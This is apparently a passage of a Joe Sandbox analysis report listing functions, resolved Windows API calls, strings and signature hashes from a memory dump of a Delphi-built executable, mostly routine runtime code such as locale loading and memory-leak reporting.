Associated: 00000000.00000002.1716539597.0000000002DE5000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE8000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c90000_image.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 50fe57d729357b51fbef34bb47cbe12a5c8f7ea06d30dbb2366e8ce29629af2d
Instruction ID: 08429049e3e016a9370d4f76373f571df547f05d262c08f6616fb5415c635286
Opcode Fuzzy Hash: 50fe57d729357b51fbef34bb47cbe12a5c8f7ea06d30dbb2366e8ce29629af2d
Instruction Fuzzy Hash: F5F0B4F2F407966BD7519F5A9C85782BB94FB40714F05027AFA4C97349D7B0A8108FD4

Function 02C916E6 Relevance: 1.3, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,02C91FE4), ref: 02C91704

Memory Dump Source

Source File: 00000000.00000002.1716190958.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000000.00000002.1716160381.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716334083.0000000002CBD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716492680.0000000002CF1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE5000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE8000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c90000_image.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 2151f62babe54b89ea49b617c7c02f28c268cfe9725ac5f5b87e0d2ce30b379c
Instruction ID: cd2f8072c4e12f52fb00b1eb8e91135779f47a477e7206d9108384f8cb6d227f
Opcode Fuzzy Hash: 2151f62babe54b89ea49b617c7c02f28c268cfe9725ac5f5b87e0d2ce30b379c
Instruction Fuzzy Hash: C9E0CD753003036FDF105B7E5D4A712BBDCEB45664F1C4476F649DB291D2E0E8108B60

Non-executed Functions

Function 02CAA954 Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02CAABDB,?,?,02CAAC6D,00000000,02CAAD49), ref: 02CAA968
GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02CAA980
GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02CAA992
GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02CAA9A4
GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02CAA9B6
GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02CAA9C8
GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02CAA9DA
GetProcAddress.KERNEL32(00000000,Process32First), ref: 02CAA9EC
GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02CAA9FE
GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02CAAA10
GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02CAAA22
GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02CAAA34
GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02CAAA46
GetProcAddress.KERNEL32(00000000,Module32First), ref: 02CAAA58
GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02CAAA6A
GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02CAAA7C
GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02CAAA8E

Strings

Module32NextW, xrefs: 02CAAA86
Thread32First, xrefs: 02CAAA2C
Process32NextW, xrefs: 02CAAA1A
Module32FirstW, xrefs: 02CAAA74
Toolhelp32ReadProcessMemory, xrefs: 02CAA9D2
Module32First, xrefs: 02CAAA50
Heap32First, xrefs: 02CAA9AE
kernel32.dll, xrefs: 02CAA963
Heap32Next, xrefs: 02CAA9C0
Module32Next, xrefs: 02CAAA62
Heap32ListFirst, xrefs: 02CAA98A
Process32Next, xrefs: 02CAA9F6
Heap32ListNext, xrefs: 02CAA99C
Process32First, xrefs: 02CAA9E4
Process32FirstW, xrefs: 02CAAA08
CreateToolhelp32Snapshot, xrefs: 02CAA978
Thread32Next, xrefs: 02CAAA3E

Memory Dump Source

Source File: 00000000.00000002.1716190958.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000000.00000002.1716160381.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716334083.0000000002CBD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716492680.0000000002CF1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE5000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE8000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c90000_image.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
API String ID: 667068680-597814768
Opcode ID: 383b7ee03275c7b77e0ac2355374248c9bb7e60f9b829c92bfbfce5b74688d80
Instruction ID: 08bbd74c20f326715620d493a0a7f89ba793f8269700d6e864cc637e48e05fea
Opcode Fuzzy Hash: 383b7ee03275c7b77e0ac2355374248c9bb7e60f9b829c92bfbfce5b74688d80
Instruction Fuzzy Hash: 5331DAB0A81321EFEF41AFB5E8A9B2637FEEB05744B140A65A506CF244D7B49810DF91

Function 02C958B4 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 139stringlibraryfileCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,02C96BC8,02C90000,02CBD790), ref: 02C958D1
GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 02C958E8
lstrcpynA.KERNEL32(?,?,?), ref: 02C95918
lstrcpynA.KERNEL32(?,?,?,kernel32.dll,02C96BC8,02C90000,02CBD790), ref: 02C9597C
lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,02C96BC8,02C90000,02CBD790), ref: 02C959B2
FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,02C96BC8,02C90000,02CBD790), ref: 02C959C5
FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,02C96BC8,02C90000,02CBD790), ref: 02C959D7
lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02C96BC8,02C90000,02CBD790), ref: 02C959E3
lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02C96BC8,02C90000), ref: 02C95A17
lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02C96BC8), ref: 02C95A23
lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 02C95A45

Strings

kernel32.dll, xrefs: 02C958CC
GetLongPathNameA, xrefs: 02C958DF
\, xrefs: 02C959F5

Memory Dump Source

Source File: 00000000.00000002.1716190958.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000000.00000002.1716160381.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716334083.0000000002CBD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716492680.0000000002CF1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE5000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE8000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c90000_image.jbxd

Similarity

API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
String ID: GetLongPathNameA$\$kernel32.dll
API String ID: 3245196872-1565342463
Opcode ID: 9c7fba58b8426ed722d51b556f454ec86496adb00952f524504a2f1b30d33e84
Instruction ID: 7b54370ca5e85d0e00879ca7d2b4a51282eb59e90cc54cccce235e26e30f82b1
Opcode Fuzzy Hash: 9c7fba58b8426ed722d51b556f454ec86496adb00952f524504a2f1b30d33e84
Instruction Fuzzy Hash: 5F415C71D40659AFDF11DBE8CC8CAEEB3ADAF48390F4845A5A148E7241D7709B44CF54

Function 02C95B84 Relevance: 15.1, APIs: 10, Instructions: 98stringlibrarythreadCOMMON

Download Yara Rule

APIs

lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02C95B94
GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02C95BA1
GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02C95BA7
lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02C95BD2
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02C95C19
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02C95C29
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02C95C51
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02C95C61
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02C95C87
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02C95C97

Strings

Software\Borland\Delphi\Locales, xrefs: 02C95AE4
Software\Borland\Locales, xrefs: 02C95AA8, 02C95AC6

Memory Dump Source

Source File: 00000000.00000002.1716190958.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000000.00000002.1716160381.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716334083.0000000002CBD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716492680.0000000002CF1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE5000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE8000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c90000_image.jbxd

Similarity

API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
API String ID: 1599918012-2375825460
Opcode ID: 872c564c5497cc255b6ddda9ad26ad67b225e16f2838cfcbc1086dd5fd5d1ed0
Instruction ID: 8c3a7fb8db8169971b5d706cdf6f31234e21c89e7a11c71a3bdf41ce49b74474
Opcode Fuzzy Hash: 872c564c5497cc255b6ddda9ad26ad67b225e16f2838cfcbc1086dd5fd5d1ed0
Instruction Fuzzy Hash: 2B3175B1E4061D7AEF26D6B8DC4EBDF77AD5B443C0F4441E19608E6181DAB49B44CF90

Function 02C97F52 Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02C97F75

Memory Dump Source

Source File: 00000000.00000002.1716190958.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000000.00000002.1716160381.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716334083.0000000002CBD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716492680.0000000002CF1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE5000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE8000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c90000_image.jbxd

Similarity

API ID: DiskFreeSpace
String ID:
API String ID: 1705453755-0
Opcode ID: af95a7847bce4aac7ce6c5ec9bc2f4eb7d8060860abe66f176e19b8d00619888
Instruction ID: f128f65a5bf35c7f47b80beac9dbe1ff83adce42f763c03c3680d15807dd940a
Opcode Fuzzy Hash: af95a7847bce4aac7ce6c5ec9bc2f4eb7d8060860abe66f176e19b8d00619888
Instruction Fuzzy Hash: 5A11C0B5A00209AF9B04DF99C9819AFF7F9FFC8704B14C569A509EB254E6719A018B90

Function 02C9A744 Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02C9A762

Memory Dump Source

Source File: 00000000.00000002.1716190958.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000000.00000002.1716160381.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716334083.0000000002CBD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716492680.0000000002CF1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE5000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE8000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c90000_image.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 91039f575b2d446255c84316eb4a3d27fa0998d30cefffcfb9a5ad718a7383d1
Instruction ID: b330801bbe87218c2ade38434e7ac09dc1298ea4f20dff0ea01e2fdc7ff12f87
Opcode Fuzzy Hash: 91039f575b2d446255c84316eb4a3d27fa0998d30cefffcfb9a5ad718a7383d1
Instruction Fuzzy Hash: CAE0D83570021417DB25A5A85C899F6735D975C710F00417EFD09C7380EDB19E404EE4

Function 02C9B70C Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32(?,02CBC106,00000000,02CBC11E), ref: 02C9B71A

Memory Dump Source

Source File: 00000000.00000002.1716190958.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000000.00000002.1716160381.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716334083.0000000002CBD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716492680.0000000002CF1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE5000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE8000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c90000_image.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: 92cc808da256188a32ea2ad2ff74320dd036fb6ace6610abb0edb9bd8b16d6c8
Instruction ID: 6c1044db5aeda140c81e8cd8189d4dd7ac09b4aa7457759ab70cf4f637cd6c40
Opcode Fuzzy Hash: 92cc808da256188a32ea2ad2ff74320dd036fb6ace6610abb0edb9bd8b16d6c8
Instruction Fuzzy Hash: D0F017B8904302EFC755DF28E544B5577E0FB88B04F054A28E49AD7784E7359914CF62

Function 02C9A790 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,02C9BDF2,00000000,02C9C00B,?,?,00000000,00000000), ref: 02C9A7A3

Memory Dump Source

Source File: 00000000.00000002.1716190958.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000000.00000002.1716160381.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716334083.0000000002CBD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716492680.0000000002CF1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE5000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE8000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c90000_image.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 247628b8c1feb2e7e236466855a8f0c303f798d01677e0f323818b1e94eef0a4
Instruction ID: 0f2bbec0aa081781ede6fc5119a138ff9179d4530e7de7a6c64643ac7d7f0f07
Opcode Fuzzy Hash: 247628b8c1feb2e7e236466855a8f0c303f798d01677e0f323818b1e94eef0a4
Instruction Fuzzy Hash: E7D05EB630E2602AA620915B2D89D7B5AFCCBC57A1F10403EF588C6240D2108D0596F1

Function 02C9918C Relevance: 1.5, APIs: 1, Instructions: 6timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 02C99190

Memory Dump Source

Source File: 00000000.00000002.1716190958.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000000.00000002.1716160381.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716334083.0000000002CBD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716492680.0000000002CF1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE5000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE8000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c90000_image.jbxd

Similarity

API ID: LocalTime
String ID:
API String ID: 481472006-0
Opcode ID: 826dc02cb97be1f30314bd8e5388bcaace96657751e1fb4d4dbee66b4f4147a3
Instruction ID: ad4d5aaadeaf123b6524a7c318300e8f744aea4f03641a4a6801615f7083816e
Opcode Fuzzy Hash: 826dc02cb97be1f30314bd8e5388bcaace96657751e1fb4d4dbee66b4f4147a3
Instruction Fuzzy Hash: CDA01120808C20028A803B280C0223A3088AA00A20FE80F80A8F8802E0EE2E0220A0E3

Function 02C920C4 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1716190958.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000000.00000002.1716160381.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716334083.0000000002CBD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716492680.0000000002CF1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE5000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE8000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c90000_image.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290

Function 02C9D214 Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 02C9D21D

Part of subcall function 02C9D1E8: GetProcAddress.KERNEL32(00000000), ref: 02C9D201

Strings

VarAnd, xrefs: 02C9D2F1
VarDateFromStr, xrefs: 02C9D38B
VarAdd, xrefs: 02C9D26D
VariantChangeTypeEx, xrefs: 02C9D22B
VarR4FromStr, xrefs: 02C9D35F
VarR8FromStr, xrefs: 02C9D375
VarCyFromStr, xrefs: 02C9D3A1
VarOr, xrefs: 02C9D307
VarNot, xrefs: 02C9D257
VarIdiv, xrefs: 02C9D2C5
VarI4FromStr, xrefs: 02C9D349
VarDiv, xrefs: 02C9D2AF
VarMul, xrefs: 02C9D299
VarBstrFromBool, xrefs: 02C9D3F9
VarBoolFromStr, xrefs: 02C9D3B7
VarSub, xrefs: 02C9D283
VarXor, xrefs: 02C9D31D
oleaut32.dll, xrefs: 02C9D218
VarMod, xrefs: 02C9D2DB
VarCmp, xrefs: 02C9D333
VarBstrFromCy, xrefs: 02C9D3CD
VarNeg, xrefs: 02C9D241
VarBstrFromDate, xrefs: 02C9D3E3

Memory Dump Source

Source File: 00000000.00000002.1716190958.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000000.00000002.1716160381.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716334083.0000000002CBD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716492680.0000000002CF1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE5000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE8000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c90000_image.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
API String ID: 1646373207-1918263038
Opcode ID: f5463cdbaa731f162b13adc51f6920805709f84f192d6f8f2e929dec74d437e9
Instruction ID: 23e619fb81d1c9be59ac23ad2c048fd2e9d9dcdb0e2895caed1d15e932398903
Opcode Fuzzy Hash: f5463cdbaa731f162b13adc51f6920805709f84f192d6f8f2e929dec74d437e9
Instruction Fuzzy Hash: 0B417EF2A842099B1E087BAE790C5277BDED3C97203A0451BF00AEB740DE30BE505E79

Function 02CA6E58 Relevance: 24.5, APIs: 7, Strings: 7, Instructions: 32libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ole32.dll), ref: 02CA6E5E
GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 02CA6E6F
GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 02CA6E7F
GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 02CA6E8F
GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 02CA6E9F
GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 02CA6EAF
GetProcAddress.KERNEL32(00000000,CoSuspendClassObjects), ref: 02CA6EBF

Strings

CoInitializeEx, xrefs: 02CA6E79
CoReleaseServerProcess, xrefs: 02CA6E99
CoAddRefServerProcess, xrefs: 02CA6E89
CoCreateInstanceEx, xrefs: 02CA6E69
CoResumeClassObjects, xrefs: 02CA6EA9
CoSuspendClassObjects, xrefs: 02CA6EB9
ole32.dll, xrefs: 02CA6E59

Memory Dump Source

Source File: 00000000.00000002.1716190958.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000000.00000002.1716160381.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716334083.0000000002CBD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716492680.0000000002CF1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE5000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE8000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c90000_image.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
API String ID: 667068680-2233174745
Opcode ID: bd9a5654022831d77ad09d106c603f6856a76e4715769e69cdfe5edd66d1d798
Instruction ID: 64de65f4e11852a362f03424fe88e05e74563f7f9ceb5a3494a69f6dd27b0fda
Opcode Fuzzy Hash: bd9a5654022831d77ad09d106c603f6856a76e4715769e69cdfe5edd66d1d798
Instruction Fuzzy Hash: 69F0C9F0AC83937EBF017FB09CA5A372B5DDB01A4C7381A79740365982DAB5C8105FA0

Function 02C92530 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 254windowCOMMON

Download Yara Rule

APIs

MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 02C928CE

Strings

Unexpected Memory Leak, xrefs: 02C928C0
, xrefs: 02C92814
bytes: , xrefs: 02C9275D
An unexpected memory leak has occurred. , xrefs: 02C92690
String, xrefs: 02C927A1
The sizes of unexpected leaked medium and large blocks are: , xrefs: 02C92849
The unexpected small block leaks are:, xrefs: 02C92707
7, xrefs: 02C926A1
Unknown, xrefs: 02C9278C

Memory Dump Source

Source File: 00000000.00000002.1716190958.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000000.00000002.1716160381.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716334083.0000000002CBD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716492680.0000000002CF1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE5000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE8000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c90000_image.jbxd

Similarity

API ID: Message
String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
API String ID: 2030045667-32948583
Opcode ID: 4eaf876e755e25c1611bf4d0ef0665f39bb805903f555dddc0ebe20abe21eea2
Instruction ID: dc87f46f5b3fd483b332be8f0b6113d4df371b540398d599f16a0f3a39ad0d0b
Opcode Fuzzy Hash: 4eaf876e755e25c1611bf4d0ef0665f39bb805903f555dddc0ebe20abe21eea2
Instruction Fuzzy Hash: 93A10570A042949FDF21AB2CCC88BD9B6E5EB48350F1440E5DDC9AB285CB758AC5CF52

Function 02C9252E Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 188COMMON

Download Yara Rule

Strings

Unexpected Memory Leak, xrefs: 02C928C0
, xrefs: 02C92814
bytes: , xrefs: 02C9275D
An unexpected memory leak has occurred. , xrefs: 02C92690
The sizes of unexpected leaked medium and large blocks are: , xrefs: 02C92849
The unexpected small block leaks are:, xrefs: 02C92707
7, xrefs: 02C926A1

Memory Dump Source

Source File: 00000000.00000002.1716190958.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000000.00000002.1716160381.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716334083.0000000002CBD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716492680.0000000002CF1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE5000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE8000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c90000_image.jbxd

Similarity

API ID:
String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
API String ID: 0-2723507874
